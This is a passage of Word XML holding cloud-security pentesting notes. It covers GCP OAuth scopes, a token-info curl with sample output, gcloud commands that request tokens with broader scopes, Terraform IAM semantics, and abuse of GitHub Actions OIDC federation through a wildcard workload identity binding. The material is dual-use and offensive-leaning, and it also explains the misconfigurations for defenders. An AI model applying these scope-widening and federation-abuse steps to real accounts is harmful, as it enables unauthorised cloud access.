          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> to access the GCP API endpoints. They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restrict the permissions</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> of the OAuth token. This means that if a token belongs to an Owner of a resource but doesn't have the in the token scope to access that resource, the token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cannot be used to (ab)use those privileges</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62175F51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Google actually </w:t>
      </w:r>
      <w:hyperlink r:id="rId46" w:anchor="service_account_permissions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recommends</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> that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access scopes are not used and to rely totally on IAM</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve">. The web management portal </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>actually enforces</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> this, but access scopes can still be applied to instances using custom service accounts programmatically.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35B09997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see what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scopes</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> are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assigned</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> by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querying:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="530116A9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6BCF454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curl 'https://www.googleapis.com/oauth2/v1/tokeninfo?access_token=&lt;access_token&gt;'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09A2C17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3E4BD1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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3936BA1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issued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_to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"223044615559.apps.googleusercontent.com",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="038D56E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"audience": "223044615559.apps.googleusercontent.com",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="604A9F6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user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"139746512919298469201",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29D1E59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"scope":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openid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https://www.googleapis.com/auth/userinfo.email https://www.googleapis.com/auth/cloud-platform https://www.googleapis.com/auth/appengine.admin https://www.googleapis.com/auth/sqlservice.login https://www.googleapis.com/auth/compute https://www.googleapis.com/auth/accounts.reauth",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7461D46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expires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_in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2253,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="681D771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"email": "username@testing.com",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D6F605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verified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_email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true,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44CFA40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access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_type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"offline"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CD5544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14:paraId="4F0EDB31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previous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scopes</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> are the ones generated by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default</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> using </w:t>
      </w:r>
      <w:proofErr w:type="spell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gcloud</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> to access data. This is because when you use </w:t>
      </w:r>
      <w:proofErr w:type="spell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gcloud</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> you first create an OAuth token, and then use it to contact the endpoints.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07FBD805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most important scope of those potentially is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cloud-platform</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve">, which basically means that it's possible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access any service in GCP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="639AFCE6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find a list of</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId47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all the possible scopes in here</w:t>
        </w:r>
      </w:hyperlink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.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BE4EF87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have </w:t>
      </w:r>
      <w:proofErr w:type="spell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gcloud</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> browser credentials, it's possible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obtain a token with other scopes,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> doing something like:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28C5DE11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49E50BB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Maybe you can get a user token with other scopes changing the scopes array from ~/.config/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credentials.db</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="72FF47A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66C487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Set new scopes for SDKs credentials</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="432456F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application-default login --scopes=https://www.googleapis.com/auth/userinfo.email,https://www.googleapis.com/auth/cloud-platform,https://www.googleapis.com/auth/sqlservice.login,https://www.googleapis.com/auth/appengine.admin,https://www.googleapis.com/auth/compute,https://www.googleapis.com/auth/accounts.reauth,https://www.googleapis.com/auth/admin.directory.user,https://www.googleapis.com/auth/admin.directory.group,https://www.googleapis.com/auth/admin.directory.domain,https://www.googleapis.com/auth/admin.directory.user</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64283C5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6A062F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Print new token </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0201C43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application-default print-access-token</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18D1899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9971E6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To use this token with some API you might need to use curl to indicate the project header with --header "X-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Goog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-User-Project: &lt;project-name&gt;"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75760BAA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Terraform IAM Policies, Bindings and Memberships</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CAA6614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As defined by terraform in </w:t>
      </w:r>
      <w:hyperlink r:id="rId48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https://registry.terraform.io/providers/hashicorp/google/latest/docs/resources/google_project_iam</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> using terraform with GCP there are different ways to grant a principal access over a resource:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="401AE7B4" w14:textId="77777777" w:rsidR="003E0641" w:rsidRDefault="003E0641" w:rsidP="003E0641">
      <w:pPr>
        <w:pStyle w:val="max-w-3xl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Memberships</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve">: You set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principals as members of roles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without restrictions</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> over the role or the principals. You can put a user as a member of a role and then put a group as a member of the same role </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>and also</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> set those </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>principals</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> (user and group) as member of other roles.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6337C772" w14:textId="77777777" w:rsidR="003E0641" w:rsidRDefault="003E0641" w:rsidP="003E0641">
      <w:pPr>
        <w:pStyle w:val="max-w-3xl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Bindings</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve">: Several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principals can be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binded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to a role</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve">. Those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principals can still be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binded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or be members of other roles</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve">. However, if a principal which isn’t </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>binded</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> to the role is set as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member of a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binded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role</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve">, the next time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binding is applied, the membership will disappear</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DEB3F32" w14:textId="77777777" w:rsidR="003E0641" w:rsidRDefault="003E0641" w:rsidP="003E0641">
      <w:pPr>
        <w:pStyle w:val="max-w-3xl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Policies</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve">: A policy is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authoritative</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve">, it indicates roles and principals and then,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those principals cannot have more roles and those roles cannot have more principals</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> unless that policy is modified (not even in other policies, bindings or memberships). Therefore, when a role or principal is specified in policy all its privileges are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limited by that policy</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>. Obviously, this can be bypassed in case the principal is given the option to modify the policy or privilege escalation permissions (like create a new principal and bind him a new role).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74E458BF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References</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="772D93B1" w14:textId="77777777" w:rsidR="003E0641" w:rsidRDefault="003E0641" w:rsidP="003E0641">
      <w:pPr>
        <w:pStyle w:val="max-w-3xl"/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49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https://about.gitlab.com/blog/2020/02/12/plundering-gcp-escalating-privileges-in-google-cloud-platform/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="2A87D454" w14:textId="77777777" w:rsidR="003E0641" w:rsidRDefault="003E0641" w:rsidP="003E0641">
      <w:pPr>
        <w:pStyle w:val="max-w-3xl"/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50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https://cloud.google.com/resource-manager/docs/cloud-platform-resource-hierarchy</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="7B95D5CD" w14:textId="77777777" w:rsidR="003E0641" w:rsidRDefault="003E0641"/>
    <w:p w14:paraId="5A467447" w14:textId="77777777" w:rsidR="003E0641" w:rsidRDefault="003E0641"/>
    <w:p w14:paraId="60A39059" w14:textId="77777777" w:rsidR="003E0641" w:rsidRDefault="003E0641"/>
    <w:p w14:paraId="749F3B29" w14:textId="77777777" w:rsidR="003E0641" w:rsidRDefault="003E0641" w:rsidP="003E0641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>GCP - Federation Abuse</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D0CAB16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lastRenderedPageBreak/>
        <w:t xml:space="preserve">OIDC - </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t>Github</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t xml:space="preserve"> Actions Abuse</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A0C2357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GCP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EB48ADB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order to give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access to the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Github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Actions</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> from a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repo to a GCP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service account</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> the following steps are needed:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F3FF3FC" w14:textId="77777777" w:rsidR="003E0641" w:rsidRDefault="003E0641" w:rsidP="003E0641">
      <w:pPr>
        <w:pStyle w:val="max-w-3xl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Create the Service Account</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> to access from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actions with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desired permissions:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="037FF147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5E57E57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projectId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=FIXME</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D0AFAA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config set project $</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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projectId</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="593F564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6DDE9C4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# Create the Service Account</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="101DC3C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service-accounts create "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github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-demo-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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sa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"</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="60ED8D4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saId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="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github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-demo-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sa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@${projectId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}.iam.gserviceaccount.com</w:t>
      </w:r>
      <w:proofErr w:type="gram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"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1451B5A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1DB2D83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# Enable the IAM Credentials API</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="711D2B7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services enable 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iamcredentials.googleapis.com</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="071A4A2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169AA73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# Give permissions to SA</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="460E7B1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349425F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projects add-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-policy-binding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projectId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3280AEE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--member="</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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serviceAccount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:$</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gram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saId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" \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DC27C4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--role="roles/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iam.securityReviewer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"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79279280" w14:textId="77777777" w:rsidR="003E0641" w:rsidRDefault="003E0641" w:rsidP="003E0641">
      <w:pPr>
        <w:pStyle w:val="max-w-3xl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Generate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new workload identity pool</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E2C345A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0E16AA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# Create a Workload Identity Pool</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62C4D87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wi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-pool</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34B2151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2EE0FFC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workload-identity-pools create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08C26ED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--location global \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2623AC6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--display-name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</w:p>
    <w:p w14:paraId="419A24B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517F61E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=$(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workload-identity-pools describe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1EDB206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--location global \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5776C83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--format='get(name)')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02EBB3AF" w14:textId="77777777" w:rsidR="003E0641" w:rsidRDefault="003E0641" w:rsidP="003E0641">
      <w:pPr>
        <w:pStyle w:val="max-w-3xl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Generate a new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workload identity pool OIDC provider</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> that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trusts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actions (by org/repo name in this scenario):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="275901EA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CAB307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attributeMappingScope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=repository # could be sub (GitHub repository and branch) or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repository_owner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(GitHub organization)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E6F60D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41E395A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workload-identity-pools providers create-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oidc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52F1680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--location global \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="122FF8F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--workload-identity-pool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556F905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--display-name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3402688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--attribute-mapping "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google.subject</w:t>
      </w:r>
      <w:proofErr w:type="gram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=assertion.${attributeMappingScope},attribute.actor=assertion.actor,attribute.aud=assertion.aud,attribute.repository=assertion.repository" \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B70B89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--issuer-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uri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"https://token.actions.githubusercontent.com"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E675A5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2E02A13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providerId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=$(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workload-identity-pools providers describe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35F079E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--location global \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6580629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--workload-identity-pool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0953EB8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--format='get(name)')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="737EEF8E" w14:textId="77777777" w:rsidR="003E0641" w:rsidRDefault="003E0641" w:rsidP="003E0641">
      <w:pPr>
        <w:pStyle w:val="max-w-3xl"/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Finally,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allow the principal</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> from the provider to use a service principal:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67B91B29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4353E86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gitHubRepoName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="repo-org/repo-name"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0507C8E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service-accounts add-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-policy-binding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saId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16B4229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--role "roles/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iam.workloadIdentityUser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" \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="179EA87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--member "principalSet://iam.googleapis.com/${poolId}/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attribute.$</w:t>
      </w:r>
      <w:proofErr w:type="gram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{attributeMappingScope}/${gitHubRepoName}"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CB1688C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Note how in the previous member we are specifying the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org-name/repo-name</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> as conditions to be able to access the service account (other params that makes it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more restrictive</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> like the branch could also be used).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D0486BE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However</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> it's also possible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allow all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github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to access</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> the service account creating a provider such the following using a wildcard:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31B21698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8198A8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# Create a Workload Identity Pool</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26E4378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=wi-pool2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C342C9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18A0375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workload-identity-pools create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5577AFD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--location global \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BA19D8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--display-name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</w:p>
    <w:p w14:paraId="3225166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53D8C5C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=$(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workload-identity-pools describe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3E28602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--location global \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DFC76A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lastRenderedPageBreak/>
        <w:t xml:space="preserve">  --format='get(name)')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="495FD18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7BF54BF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workload-identity-pools providers create-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oidc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0C6FC6C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--project="${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projectId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}" \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="372992F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--location="global" \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50F6E87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--workload-identity-pool="$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" \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B3FF61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--display-name="Demo provider" \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FCFBAC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--attribute-mapping="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google.subject</w:t>
      </w:r>
      <w:proofErr w:type="gram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=assertion.sub,attribute.actor=assertion.actor,attribute.aud=assertion.aud" \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F3E0F0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--issuer-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uri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="https://token.actions.githubusercontent.com"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AD3877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6000A6E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providerId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=$(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workload-identity-pools providers describe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140F375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--location global \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26CA0B0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--workload-identity-pool $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poolName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\</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3014BA0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--format='get(name)')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="263216E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6AA6879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# CHECK THE WILDCARD</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11ADAC7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service-accounts add-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-policy-binding "${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saId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}" \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EBE129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--project="${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projectId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}" \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CDB2D8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--role="roles/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iam.workloadIdentityUser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" \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F6D65C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--member="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principalSet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://iam.googleapis.com/${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poolId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}/*"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12E5B0CD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case anyone could access the service account from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actions, so it's important always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check how the member is defined</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>. It should be always something like this:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10BC5C7A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proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="var(--font-mono)" w:hAnsi="var(--font-mono)"/>
          <w:bdr w:val="single" w:sz="2" w:space="0" w:color="E5E7EB" w:frame="1"/>
        </w:rPr>
        <w:t>attribute.{</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="var(--font-mono)" w:hAnsi="var(--font-mono)"/>
          <w:bdr w:val="single" w:sz="2" w:space="0" w:color="E5E7EB" w:frame="1"/>
        </w:rPr>
        <w:t>custom_attribute}</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="var(--font-mono)" w:hAnsi="var(--font-mono)"/>
          <w:bdr w:val="single" w:sz="2" w:space="0" w:color="E5E7EB" w:frame="1"/>
        </w:rPr>
        <w:t>principalSet://iam.googleapis.com/projects/{project}/locations/{location}/workloadIdentityPools/{pool}/attribute.{custom_attribute}/{value}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25346A0C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r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t>Github</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="66D50AE6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Remember to change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${</w:t>
      </w:r>
      <w:proofErr w:type="spell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providerId</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="var(--font-mono)" w:hAnsi="var(--font-mono)" w:cs="Courier New"/>
